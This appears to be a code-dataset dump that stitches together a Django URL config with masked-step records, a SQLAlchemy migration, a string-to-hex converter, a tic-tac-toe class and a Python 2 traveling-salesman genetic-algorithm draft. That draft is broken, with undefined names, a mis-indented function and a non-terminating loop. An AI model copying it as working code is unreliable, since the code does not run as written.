url(r'^admin/', admin.site.urls),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
normal
|
{
"blob_id": "312a95c9514722157653365104d8cd0ada760ce8",
"index": 8084,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-3": "<mask token>\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom .auth.views import account_profile\nfrom .views import member_index, member_action\nurlpatterns = [url('^$', TemplateView.as_view(template_name=\n 'visitor/landing-index.html'), name='landing_index'), url('^about$',\n TemplateView.as_view(template_name='visitor/landing-about.html'), name=\n 'landing_about'), url('^terms/$', TemplateView.as_view(template_name=\n 'visitor/terms.html'), name='website_terms'), url('^contact$',\n TemplateView.as_view(template_name='visitor/contact.html'), name=\n 'website_contact'), url('^accounts/', include('allauth.urls')), url(\n '^accounts/profile/$', account_profile, name='account_profile'), url(\n '^member/$', member_index, name='user_home'), url('^member/action$',\n member_action, name='user_action'), url('^admin/', admin.site.urls)\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n",
"step-4": "\"\"\"URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import include, url\r\nfrom django.contrib import admin\r\nfrom django.views.generic import TemplateView\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\nfrom .auth.views import account_profile\r\nfrom .views import member_index, member_action\r\n\r\nurlpatterns = [\r\n # Landing page area\r\n url(r'^$', TemplateView.as_view(template_name='visitor/landing-index.html'), name='landing_index'),\r\n url(r'^about$', TemplateView.as_view(template_name='visitor/landing-about.html'), name='landing_about'),\r\n url(r'^terms/$', TemplateView.as_view(template_name='visitor/terms.html'), name='website_terms'),\r\n url(r'^contact$', TemplateView.as_view(template_name='visitor/contact.html'), name='website_contact'),\r\n\r\n # Account management is done by allauth\r\n url(r'^accounts/', include('allauth.urls')),\r\n\r\n # Account profile and member info done locally\r\n url(r'^accounts/profile/$', account_profile, name='account_profile'),\r\n url(r'^member/$', member_index, name='user_home'),\r\n url(r'^member/action$', member_action, name='user_action'),\r\n\r\n # Usual Django admin\r\n url(r'^admin/', admin.site.urls),\r\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer
from migrate import *
meta = MetaData()
table = Table(
'accesses', meta,
Column('id', BigInteger, primary_key=True, nullable=False),
Column('uuid', String(255), nullable=False),
Column('created_at', DateTime),
)
def upgrade(migrate_engine):
meta.bind = migrate_engine
table.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
table.drop()
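

# Hedged usage sketch (illustration only, not part of the original migration):
# sqlalchemy-migrate normally invokes upgrade()/downgrade() through its `migrate`
# CLI, but the functions can also be exercised directly against an engine, e.g.:
#
#   from sqlalchemy import create_engine
#   engine = create_engine('sqlite://')   # throwaway in-memory database
#   upgrade(engine)     # creates the 'accesses' table
#   downgrade(engine)   # drops it again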
|
normal
|
{
"blob_id": "6154979cd2853dd2bd26d1ae5df7365efa0141c2",
"index": 441,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-3": "<mask token>\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-4": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\nmeta = MetaData()\ntable = Table('accesses', meta, Column('id', BigInteger, primary_key=True,\n nullable=False), Column('uuid', String(255), nullable=False), Column(\n 'created_at', DateTime))\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-5": "from sqlalchemy import Column, MetaData, Table, BigInteger, String, DateTime, Integer\nfrom migrate import *\n\nmeta = MetaData()\ntable = Table(\n 'accesses', meta,\n Column('id', BigInteger, primary_key=True, nullable=False),\n Column('uuid', String(255), nullable=False),\n Column('created_at', DateTime),\n)\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n table.create()\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n table.drop()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#print pathToConnectionsList(['A','C','B','D','E'])
#['EA','CB','AC','BD', 'DE']
#print independantPathPieces()
#print pathToConnectionsList(pathGenerator())
#print geneFormatToPathSegmentsMini(['CD', 'AB', 'BE', 'EC']) #DA
#print independantPathPieces(['EAC', 'CBD', 'ACB', 'BDE', 'DEA'])
#print greedyCrossover(['EC', 'CD', 'AB', 'BE','DF','FA'],['EC', 'XX', 'XX', 'XX','XX','xx'], 3)
#['ABECD', '', '__', '__']
# def joinPathBits(pathBits):
# index = 0
# for index in range(len(pathBits)):
# # figure out nex and prev point
# while matchFound:
# matchFound = False
# next = pathBits[index][-1]
# prev = pathBits[index][0]
# while True
# index2 = 1
# if next == pathBits[index2][0] and next != '_':
# join one way
# matchFound = True
# elif prev == pathBits[index2][-1] and prev != '_':
# join another
# matchFound = True
# def findpaths(segments):
# path_starts = {} # path_start:path
# path_ends = {} # path_end:path
# starts = {} # start:end of a segment
# #path_prefixes = []
# for segment in segments:
# starts[segment[0]] = segment[1]
# for start in starts:
# next = segment[start]
# if next in starts: # a longer path's been found
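
# Encoding note (inferred from geneFormatToPathSegments/writeToGene below): a gene is
# a list with one two-character codon per city; codon i holds the letters of the city
# visited just before and just after city charset[i], and '_' marks a neighbour that
# is still unknown. E.g. codon 'BD' at the position of city 'C' encodes B -> C -> D.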
def writeToGene(toOrFromPos,whichCodon,whichGene,whatToWrite):
if toOrFromPos == 'to': pos = 1
if toOrFromPos == 'from': pos = 0
#print "which codon: " + str(whichCodon)
#print "postion: " + str(pos)
# check if whichgene[whichcodon is empty]
if whichCodon == 88: return whichGene # this may be the worlds ugliest hack, depending on
# _ not being a reserved char aka being in the charset but also depending on the num of cities
# in the prob to be less that 88
spot = whichGene[whichCodon]
val = whichGene[whichCodon][pos]
#print "current value: " + str(val)
if val == whatToWrite: return whichGene
if val == "_":
#spot = ['','']
#print "spot:"
#print spot
spot = list(spot)
spot[pos] = whatToWrite
#print "spot:"
#print spot
#check if val is empty
newGene = whichGene[0:whichCodon] + ["".join(spot)] + whichGene[whichCodon+1:len(whichGene)]
return newGene
return "ERROR, NON CONSISTANT VALUE ALREADY IN POS."
#print writeToGene('to',2,['__','__','__','__','__','__','xx','xx'],'o')
#writeToGene('to',3,['','','','','','','',''],"x")
def tspGeneTemplater(gene,locCodes):
# assumes that it gets a valid gene which was constructed by common elements in two parents and an additional random element from on parent.
gene = codeBlankSpots(gene)
genecopy = gene
charset = theCharset()
for codonLoc in range(len(gene)):
codon = gene[codonLoc]
if codon !='__':
whereFrom = codon[0]
whereTo = codon[1]
current = locCodes[codonLoc]
whereFromIndex = charset.index(whereFrom)
whereToIndex = charset.index(whereTo)
current = locCodes[codonLoc]
genecopy = writeToGene('from',whereToIndex,genecopy,current)
genecopy = writeToGene('to',whereFromIndex,genecopy,current)
#at this point we should have a template!!!!
# that we can fill in.
return genecopy
#print tspGeneTemplater(['BD', 'CA', '_B', 'A_'], theCharset())
def templateToGene(gene):
# GETS A FULLY TEMPLATED GENE
# MUST NOW FILL UP THE CHARS TO MAKE A VALID GENE! WHAT A DAUNTING TASK!!
# FIRST WE GET THE CHARSETS WE ARE WORKING WITH
# ONE FOR TO AND ONE FOR FROM POSITIONS
#init
chars = theCharset()[0:len(gene)]
toChars = chars
fromChars = chars
# remove already existing chars
for codon in gene:
if codon[0] != "_": fromChars = fromChars.replace(codon[0],'',1)
if codon[1] != "_":
toChars = toChars.replace(codon[1],'',1)
else:
anEmptyToSpot = gene.index(codon)
currentLoc = chars[anEmptyToSpot]
# now we have a list of to and from chars that need to be placed in a valid configuration.
# choose a blank spot to start from (anEmptyTospot)
gene = writeToGene('from',anEmptyToSpot,gene,currentLoc)
cont = True
while cont:
toLoc = random.choice(toChars)
toChars = toChars.replace(toLoc,'',1)
gene = writeToGene('from',anEmptyToSpot,gene,currentLoc)
currentLoc = toLoc
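	# NOTE: unfinished draft. `cont` is never set to False, so this loop only stops
	# when random.choice() fails on an empty toChars, and `connectionList` below is
	# never defined before it is returned.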
writeToGene('to',2,['__','__','x_','__','__','__','xx','xx'],'o')
return connectionList
def geneFormatToPathSegments(gene):
charset = theCharset()
segments = []
for i in range(len(gene)):
spot = charset[i]
if gene[i] != '__':
segment = str(gene[i][0]) + str(spot) + str(gene[i][1])
segments.append(segment)
return segments
def indPathPieces(segmentsList):
for thisSegment in segmentsList:
for anotherSegment in segmentsList:
if thisSegment[1:2] == anotherSegment[-2:]:
newSegment = thisSegment
def independantPathPieces(path_segments = []):
# TAKES EDGE SEGMENTS FOR EACH GENE OR SOME SUBSET OF GENES AND MAKES A STRING PATH OF MIN LENGTH
#path_segments = ['LOP','BAC','FYZ','CDF','REX', 'XWL']
#path_segments = ['EAC','CBD']
path_segments = ['EA','CB','AC','BD', 'DE']
# CAREFUL: THERE IS SOME INSANITY LOGIC GOING ON HERE!
#print "path seg: " + str(path_segments)
index = 0
while index < len(path_segments):
next = path_segments[index][-1]
for j in range(len(path_segments)):
prev = path_segments[j][0]
print "next: " + next
print "prev: " + prev
print "index:" + str(index)
print path_segments
if (next == prev) and (next != '_') :
path_segments[index] = path_segments[index] + path_segments[j][1:]
path_segments[j] = '_'
next = path_segments[index][-1]
#index -=1
print path_segments
index +=1
path_segments = [x for x in path_segments if x != '_']
#print "path seg: " + str(path_segments)
return path_segments
def makeTSPGeneX(numLocations):
# this time we are going to do things smarter.
if numLocations < 3 or numLocations > 94:
print "MAX LOCATIONS IS 94, MIN LOCATIONS IS 3."
quit()
# intialize
locationsCharset = theCharset()[0:numLocations]
path = pathMaker(numLocations)
#fromLocations = locationsCharset
locIndex = dict()
locValue = dict()
# BUILD THE INDEX AND VALUE DICTS
for i in range(numLocations):
locIndex[locationsCharset[i]] = i
locValue[i] = locationsCharset[i]
connectionList = ["" for x in range(numLocations)]
return connectionList
def completeTSPGene(pGene):
# this time we are going to do things smarter.
numLocations = len(pGene)
# intialize
locationsCharset = theCharset()[0:numLocations]
toLocations = locationsCharset
fromLocations = locationsCharset
locIndex = dict()
locValue = dict()
# BUILD THE INDEX AND VALUE DICTS
for i in range(numLocations):
locIndex[locationsCharset[i]] = i
locValue[i] = locationsCharset[i]
#connectionList = ["__" for x in range(numLocations)]
# remove existing options from charsrets.
for codon in pGene:
if codon[0] != "_": fromLocations = fromLocations.replace(codon[0],'',1)
if codon[1] != "_":
toLocations = toLocations.replace(codon[1],'',1)
else:
# grab details about a codon where the to location is empty.
anEmptyToSpot = pGene.index(codon)
currentLoc = locationsCharset[anEmptyToSpot]
# we define an empty fromLoc, we have a currentLoc, and we get a toLoc!
fromLoc = "_"
#toLoc = random.choice(toLocations)
#toLocations = toLocations.replace(currentLoc, "")
for i in range(numLocations+1):
print len(toLocations)
print len(fromLocations)
print "wherefrom: " + fromLoc
print "currentloc: " + currentLoc
print "to locs options: " + str(toLocations)
print "from locs: " + str(fromLocations)
print pGene
print
#place the from loc in the from position of the current loc
if fromLoc != "_":
pGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][1])
fromLocations = fromLocations.replace(fromLoc,'',1)
if len(toLocations) == 0:
pGene[locIndex[currentLoc]] = str(fromLoc[0] ) + str(pGene[locIndex[currentLoc]][1])
return pGene
toLoc = pGene[locIndex[currentLoc]][1]
if toLoc == "_":
# get a to loc only if needed
#if len(toLocations) == 2 and len(fromLocations) == 1 and (fromLocations == toLoc)
toLoc = currentLoc
while (toLoc == currentLoc) or (toLoc == fromLoc) :
if len(toLocations) == 0:
toLoc = locValue[anEmptyToSpot]
else:
toLoc = random.choice(toLocations)
toLocations = toLocations.replace(toLoc, "")
#place it in the to position of the current loc
pGene[locIndex[currentLoc]] = str(pGene[locIndex[currentLoc]][0]) + str(toLoc)
#prepare to move to the new loc!
fromLoc = currentLoc
currentLoc = toLoc
pGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][0])
return pGene
#print completeTSPGene(['__','CD','_B','B_','__','__','AC','FI','HA'])
|
normal
|
{
"blob_id": "b4a96d5df56acd545e9919e202c462ee710a0339",
"index": 5339,
"step-1": "#print pathToConnectionsList(['A','C','B','D','E'])\n#['EA','CB','AC','BD', 'DE']\n#print independantPathPieces()\n#print pathToConnectionsList(pathGenerator())\n#print geneFormatToPathSegmentsMini(['CD', 'AB', 'BE', 'EC']) #DA\n#print independantPathPieces(['EAC', 'CBD', 'ACB', 'BDE', 'DEA'])\n#print greedyCrossover(['EC', 'CD', 'AB', 'BE','DF','FA'],['EC', 'XX', 'XX', 'XX','XX','xx'], 3)\n\n\n#['ABECD', '', '__', '__']\n\n# def joinPathBits(pathBits):\n# \tindex = 0\n# \tfor index in range(len(pathBits)):\n# \t\t# figure out nex and prev point\n\t\t\n# \t\twhile matchFound:\n# \t\t\tmatchFound = False\n# \t\t\tnext = pathBits[index][-1]\n# \t\t\tprev = pathBits[index][0]\n\n# \t\t\twhile True\n# \t\t\tindex2 = 1\t\t\t\t\n# \t\t\tif next == pathBits[index2][0] and next != '_':\n# \t\t\t\tjoin one way\n# \t\t\t\tmatchFound = True\n# \t\t\telif prev == pathBits[index2][-1] and prev != '_':\n# \t\t\t\tjoin another\n# \t\t\t\tmatchFound = True\n\n\n\n# def findpaths(segments):\n# \tpath_starts = {} # path_start:path\n# \tpath_ends = {} # path_end:path\n# \tstarts = {} # start:end of a segment\n# \t#path_prefixes = []\n# \tfor segment in segments:\n# \t\tstarts[segment[0]] = segment[1]\n# \tfor start in starts:\n# \t\tnext = segment[start]\n# \t\tif next in starts: # a longer path's been found\n\ndef writeToGene(toOrFromPos,whichCodon,whichGene,whatToWrite):\n\tif toOrFromPos == 'to': pos = 1\n\tif toOrFromPos == 'from': pos = 0\n\t#print \"which codon: \" + str(whichCodon)\n\t#print \"postion: \" + str(pos) \n\t# check if whichgene[whichcodon is empty]\n\t\n\tif whichCodon == 88: return whichGene # this may be the worlds ugliest hack, depending on\n\t# _ not being a reserved char aka being in the charset but also depending on the num of cities\n\t# in the prob to be less that 88\n\t\n\tspot = whichGene[whichCodon]\n\tval = whichGene[whichCodon][pos]\n\t#print \"current value: \" + str(val)\n\n\tif val == whatToWrite: return whichGene\n\tif val == \"_\":\n\t\t#spot = ['','']\n\t\t#print \"spot:\"\n\t\t#print spot\n\t\tspot = list(spot)\n\t\tspot[pos] = whatToWrite\n\t\t#print \"spot:\"\n\t\t#print spot\n\n\t\t#check if val is empty\n\t\tnewGene = whichGene[0:whichCodon] + [\"\".join(spot)] + whichGene[whichCodon+1:len(whichGene)]\n\t\treturn newGene\n\t\n\treturn \"ERROR, NON CONSISTANT VALUE ALREADY IN POS.\"\n\n#print writeToGene('to',2,['__','__','__','__','__','__','xx','xx'],'o')\n#writeToGene('to',3,['','','','','','','',''],\"x\")\n\n\n\ndef tspGeneTemplater(gene,locCodes):\n\t# assumes that it gets a valid gene which was constructed by common elements in two parents and an additional random element from on parent.\n\tgene = codeBlankSpots(gene)\n\tgenecopy = gene\n\tcharset = theCharset()\n\n\tfor codonLoc in range(len(gene)):\n\t\tcodon = gene[codonLoc]\n\t\tif codon !='__':\n\t\t\twhereFrom = codon[0]\n\t\t\twhereTo = codon[1]\n\t\t\tcurrent = locCodes[codonLoc]\n\n\t\t\twhereFromIndex = charset.index(whereFrom) \n\t\t\twhereToIndex = charset.index(whereTo)\n\t\t\tcurrent = locCodes[codonLoc]\n\n\t\t\tgenecopy = writeToGene('from',whereToIndex,genecopy,current)\n\t\t\tgenecopy = writeToGene('to',whereFromIndex,genecopy,current)\n\n\t#at this point we should have a template!!!!\n\t# that we can fill in.\n\treturn genecopy\n\n#print tspGeneTemplater(['BD', 'CA', '_B', 'A_'], theCharset())\n\ndef templateToGene(gene):\n\t# GETS A FULLY TEMPLATED GENE\n\t# MUST NOW FILL UP THE CHARS TO MAKE A VALID GENE! 
WHAT A DAUNTING TASK!!\n\n\t# FIRST WE GET THE CHARSETS WE ARE WORKING WITH\n\t# ONE FOR TO AND ONE FOR FROM POSITIONS\n\t#init\n\tchars = theCharset()[0:len(gene)]\n\ttoChars = chars\n\tfromChars = chars\n\n\t# remove already existing chars\n\tfor codon in gene:\n\t\tif codon[0] != \"_\": fromChars = fromChars.replace(codon[0],'',1)\n\t\tif codon[1] != \"_\":\n\t\t\ttoChars = toChars.replace(codon[1],'',1)\n\t\telse:\n\t\t\tanEmptyToSpot = gene.index(codon)\n\t\t\tcurrentLoc = chars[anEmptyToSpot]\n\n\t# now we have a list of to and from chars that need to be placed in a valid configuration.\n\t# choose a blank spot to start from (anEmptyTospot)\n\tgene = writeToGene('from',anEmptyToSpot,gene,currentLoc)\n\tcont = True\n\twhile cont:\t\n\t\ttoLoc = random.choice(toChars)\n\t\ttoChars = toChars.replace(toLoc,'',1)\n\t\tgene = writeToGene('from',anEmptyToSpot,gene,currentLoc)\n\n\t\tcurrentLoc = toLoc\n\n\twriteToGene('to',2,['__','__','x_','__','__','__','xx','xx'],'o')\n\treturn connectionList\n\n\ndef geneFormatToPathSegments(gene):\n\tcharset = theCharset()\n\tsegments = []\n\tfor i in range(len(gene)):\n\t\tspot = charset[i]\n\t\tif gene[i] != '__':\n\t\t\tsegment = str(gene[i][0]) + str(spot) + str(gene[i][1])\n\t\t\tsegments.append(segment)\n\treturn segments\n\n\n\ndef indPathPieces(segmentsList):\n\tfor thisSegment in segmentsList:\n\n\t\tfor anotherSegment in segmentsList:\n\t\t\tif thisSegment[1:2] == anotherSegment[-2:]:\n\t\t\t\tnewSegment = thisSegment\n\ndef independantPathPieces(path_segments = []):\n\t# TAKES EDGE SEGMENTS FOR EACH GENE OR SOME SUBSET OF GENES AND MAKES A STRING PATH OF MIN LENGTH\n\t#path_segments = ['LOP','BAC','FYZ','CDF','REX', 'XWL']\n\t#path_segments = ['EAC','CBD']\n\tpath_segments = ['EA','CB','AC','BD', 'DE']\n\t# CAREFUL: THERE IS SOME INSANITY LOGIC GOING ON HERE!\n\t#print \"path seg: \" + str(path_segments)\n\tindex = 0\n\twhile index < len(path_segments):\n\t\tnext = path_segments[index][-1]\n\t\t\n\t\n\t\tfor j in range(len(path_segments)):\n\t\t\tprev = path_segments[j][0]\n\t\t\tprint \"next: \" + next\n\t\t\tprint \"prev: \" + prev\n\t\t\tprint \"index:\" + str(index)\n\t\t\tprint path_segments\n\t\t\tif (next == prev) and (next != '_') :\n\t\t\t\tpath_segments[index] = path_segments[index] + path_segments[j][1:]\n\t\t\t\tpath_segments[j] = '_'\n\t\t\t\tnext = path_segments[index][-1]\n\t\t\t\t#index -=1\n\n\t\t\tprint path_segments\n\t\tindex +=1\n\tpath_segments = [x for x in path_segments if x != '_']\n\t#print \"path seg: \" + str(path_segments)\n\treturn path_segments\n\n\tdef makeTSPGeneX(numLocations):\n\t# this time we are going to do things smarter.\n\tif numLocations < 3 or numLocations > 94:\n\t\tprint \"MAX LOCATIONS IS 94, MIN LOCATIONS IS 3.\"\n\t\tquit()\n\n\t# intialize\n\tlocationsCharset = theCharset()[0:numLocations]\n\tpath = pathMaker(numLocations)\n\t#fromLocations = locationsCharset\n\n\tlocIndex = dict()\n\tlocValue = dict()\n\t\n\t# BUILD THE INDEX AND VALUE DICTS\n\tfor i in range(numLocations):\n\t\tlocIndex[locationsCharset[i]] = i\n\t\tlocValue[i] = locationsCharset[i]\n\t\tconnectionList = [\"\" for x in range(numLocations)]\n\n\treturn connectionList\n\n\ndef completeTSPGene(pGene):\n\t# this time we are going to do things smarter.\n\tnumLocations = len(pGene) \n\n\t# intialize\n\tlocationsCharset = theCharset()[0:numLocations]\n\ttoLocations = locationsCharset\n\tfromLocations = locationsCharset\n\n\tlocIndex = dict()\n\tlocValue = dict()\n\t\n\t# BUILD THE INDEX AND VALUE DICTS\n\tfor i in 
range(numLocations):\n\t\tlocIndex[locationsCharset[i]] = i\n\t\tlocValue[i] = locationsCharset[i]\n\t\t#connectionList = [\"__\" for x in range(numLocations)]\n\n\t# remove existing options from charsrets.\n\tfor codon in pGene:\n\t\tif codon[0] != \"_\": fromLocations = fromLocations.replace(codon[0],'',1)\n\t\tif codon[1] != \"_\":\n\t\t\ttoLocations = toLocations.replace(codon[1],'',1)\n\t\telse:\n\t\t\t# grab details about a codon where the to location is empty. \n\t\t\tanEmptyToSpot = pGene.index(codon)\n\t\t\tcurrentLoc = locationsCharset[anEmptyToSpot]\n\n\t# we define an empty fromLoc, we have a currentLoc, and we get a toLoc!\n\tfromLoc = \"_\"\n\t#toLoc = random.choice(toLocations)\n\t#toLocations = toLocations.replace(currentLoc, \"\")\n\n\t\n\tfor i in range(numLocations+1):\n\t\tprint len(toLocations)\n\t\tprint len(fromLocations)\n\t\tprint \"wherefrom: \" + fromLoc\n\t\tprint \"currentloc: \" + currentLoc\n\t\tprint \"to locs options: \" + str(toLocations)\n\t\tprint \"from locs: \" + str(fromLocations)\n\t\tprint pGene\n\t\tprint \n\t\t#place the from loc in the from position of the current loc\n\t\tif fromLoc != \"_\": \n\t\t\tpGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][1])\n\t\t\tfromLocations = fromLocations.replace(fromLoc,'',1)\n\n\n\t\tif len(toLocations) == 0:\n\t\t\tpGene[locIndex[currentLoc]] = str(fromLoc[0] ) + str(pGene[locIndex[currentLoc]][1])\n\t\t\treturn pGene\n\n\t\ttoLoc = pGene[locIndex[currentLoc]][1]\n\t\tif toLoc == \"_\":\n\t\t\t# get a to loc only if needed\n\t\t\t#if len(toLocations) == 2 and len(fromLocations) == 1 and (fromLocations == toLoc)\n\n\t\t\ttoLoc = currentLoc\n\t\t\twhile (toLoc == currentLoc) or (toLoc == fromLoc) :\n\t\t\t\tif len(toLocations) == 0:\n\t\t\t\t\ttoLoc = locValue[anEmptyToSpot]\n\t\t\t\telse:\t\t\t\n\t\t\t\t\ttoLoc = random.choice(toLocations)\n\t\t\ttoLocations = toLocations.replace(toLoc, \"\")\n\n\t\t#place it in the to position of the current loc\n\t\tpGene[locIndex[currentLoc]] = str(pGene[locIndex[currentLoc]][0]) + str(toLoc)\n\n\t\t#prepare to move to the new loc!\n\t\tfromLoc = currentLoc\n\t\tcurrentLoc = toLoc\n\n\tpGene[locIndex[currentLoc]] = str(fromLoc) + str(pGene[locIndex[currentLoc]][0])\n\treturn pGene\n\n#print completeTSPGene(['__','CD','_B','B_','__','__','AC','FI','HA'])",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python3
'''
generator.py
This program inputs a strings, and outputs the corresponding hex
Creator: Ethan Knight
Email: [email protected]
Published: 20181116
'''
import sys
import time
import binascii
def main():
print("\n", sys.version_info)
try:
while True:
print("\n\nPress Ctrl+C to exit.")
usr=test()
out=binascii.hexlify(bytes(usr, encoding="utf8"))
print("\nHex:\t\t", out)
print("Base 10:\t", int(out,16))
time.sleep(.5)
except KeyboardInterrupt:
print("\tProgram Terminated\n\n")
sys.exit(0)
def test():
while True:
usr=input("Enter the string to convert\n\n\t")
if usr!="":
return usr
else:
print("\nNo string entered.")
if __name__=="__main__":
main()
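
# Worked example of the conversion performed above (illustrative): for the input
# string "Hi", binascii.hexlify(b"Hi") returns b'4869', and int(b'4869', 16) is 18537.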
|
normal
|
{
"blob_id": "a52cbe6dbf4b4fc82d09e5f34e6e135933f3af38",
"index": 1418,
"step-1": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys\nimport time\nimport binascii\n\n\ndef main():\n print('\\n', sys.version_info)\n try:\n while True:\n print('\\n\\nPress Ctrl+C to exit.')\n usr = test()\n out = binascii.hexlify(bytes(usr, encoding='utf8'))\n print('\\nHex:\\t\\t', out)\n print('Base 10:\\t', int(out, 16))\n time.sleep(0.5)\n except KeyboardInterrupt:\n print('\\tProgram Terminated\\n\\n')\n sys.exit(0)\n\n\ndef test():\n while True:\n usr = input('Enter the string to convert\\n\\n\\t')\n if usr != '':\n return usr\n else:\n print('\\nNo string entered.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/python3\n\n'''\n generator.py\n This program inputs a strings, and outputs the corresponding hex\n Creator: Ethan Knight\n Email: [email protected]\n Published: 20181116\n'''\n\nimport sys\nimport time\nimport binascii\n\ndef main():\n print(\"\\n\", sys.version_info)\n try:\n while True:\n print(\"\\n\\nPress Ctrl+C to exit.\")\n usr=test()\n out=binascii.hexlify(bytes(usr, encoding=\"utf8\"))\n print(\"\\nHex:\\t\\t\", out)\n print(\"Base 10:\\t\", int(out,16))\n time.sleep(.5)\n except KeyboardInterrupt:\n print(\"\\tProgram Terminated\\n\\n\")\n sys.exit(0)\n\ndef test():\n while True:\n usr=input(\"Enter the string to convert\\n\\n\\t\")\n if usr!=\"\":\n return usr\n else:\n print(\"\\nNo string entered.\")\n\nif __name__==\"__main__\":\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import tkinter as tk
from functools import partial
from numpy import random
from base import NinePalaceGame
class SingleMode(NinePalaceGame):
player1 = player = 'O'
player2 = computer = 'X'
def __init__(self):
self.create_choose_one_window()
super().__init__()
self.main_game_window.mainloop()
def player_play(self, i, j):
if not self.game_is_over and not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.dominance)
self.dominance = self.computer
return 1
return 0
def computer_play(self):
if not self.game_is_over:
while 1:
i, j = random.choice(range(3)), random.choice(range(3))
if not self.box[i][j]:
self.box[i][j] = 1
self.value_group[i][j].set(self.computer)
self.dominance = self.player
break
def judge(self):
if self.check_win(self.player):
self.game_is_over = 1
self.billboard_value.set('Player is win!')
elif self.check_win(self.computer):
self.game_is_over = 1
self.billboard_value.set('Computer is win!')
elif self.check_game_over():
self.game_is_over = 1
self.billboard_value.set('Game over!')
def reset(self):
super().reset()
self.dominance = self.player
self.box = [
[0, 0, 0], [0, 0, 0], [0, 0, 0]]
self.main_game_window.withdraw()
self.choose_one_window.update()
self.choose_one_window.deiconify()
def button_function(self, i, j):
if self.player_play(i, j):
self.judge()
self.computer_play()
self.judge()
def set_O_or_X(self, use):
self.player = use
if use == 'X':
self.computer = 'O'
self.computer_play()
else:
self.computer = 'X'
self.dominance = self.player
self.choose_one_window.withdraw()
